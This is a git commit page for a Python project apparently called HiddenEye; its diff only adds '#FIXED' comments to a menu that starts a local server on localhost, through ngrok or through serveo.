Added #fixed comment to working features

This commit is contained in:
sTiKyt 2020-05-08 16:40:11 +03:00
parent 36533ca033
commit 87a30940c9
No known key found for this signature in database
GPG Key ID: 510E1C3C9B2414B4

View File

@ -25,10 +25,10 @@ def server_selection(port): # Question where user must select server
choice = input(" \n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2]))
if choice == '0':
run_command('clear')
server_runner.start_localhost(port)
server_runner.start_localhost(port) #FIXED
elif choice == '1':
run_command('clear')
server_runner.start_ngrok(port)
server_runner.start_ngrok(port) # FIXED
elif choice == '2':
run_command('clear')
server_runner.start_serveo(port)